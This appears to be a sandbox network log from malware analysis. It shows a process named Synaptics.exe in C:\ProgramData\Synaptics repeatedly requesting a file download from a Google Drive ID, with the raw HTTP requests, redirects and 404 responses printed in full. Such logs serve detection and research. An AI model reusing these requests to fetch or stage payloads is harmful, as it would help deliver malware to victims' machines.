2024-12-30 10:25:28 UTC	1602	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 75 37 42 74 6d 71 6b 46 5f 50 43 5f 30 4c 44 31 6d 51 36 70 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8u7BtmqkF_PC_0LD1mQ6pw">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:25:28 UTC	50	IN	Data Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: is server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49818	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:28 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:29 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:28 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-J7TKn19AeBJzf-iIPJZhOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49822	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:28 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:29 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:29 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-e--y_YVBUOqSn6Xt9uZQcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49829	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:29 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD
2024-12-30 10:25:29 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5ysgc8OkE3gCgB6SNQVWIKeOFkKSjzMc_7x4-AQx8cfNEOsYN6ak6zGWCGq0hVhKkj Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:29 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-fNsdd3R6rVGNcosIYFkM8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:29 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:29 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 5f 6e 44 53 2d 52 43 67 57 6e 54 4c 38 78 6a 43 5a 49 78 4e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="__nDS-RCgWnTL8xjCZIxNA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:29 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49830	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:29 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	49834	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:30 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:30 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:30 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-_lU3VnhaxWxZxf5KVPLZnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.10	49835	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:30 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:30 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC6qGZCpKx_w7_UabhzPO8OonTbtzVI75nJI7fzXpgCc12_T9lcCF40CTH9nkLox15fD Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:30 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'report-sample' 'nonce-w-BW4zQttCedl0XdzJabag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:30 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:30 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 44 56 51 34 4d 41 55 4b 42 34 4e 76 71 78 49 47 41 66 70 73 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="zDVQ4MAUKB4NvqxIGAfpsg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:30 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.10	49838	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:30 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:30 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7aFG5rdu7W40FcNCgXVkkniskiSPJWYYlRes5m1W-YERqgVXCRy0cUAiWwkPrc4_qmm7Tx_fQ Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:30 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-4hE7LsgGpBawIfsZ80NpEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:30 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:30 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 33 36 51 37 42 73 31 78 63 30 37 46 65 37 65 42 50 33 49 43 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="D36Q7Bs1xc07Fe7eBP3ICQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:30 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.10	49839	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:30 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:30 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:30 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-cKBWaHfeIYyP5k3BU4Aoyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.10	49848	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:31 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:31 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:31 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-TGqCoAQexSJyWsWky15OYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.10	49851	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:31 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
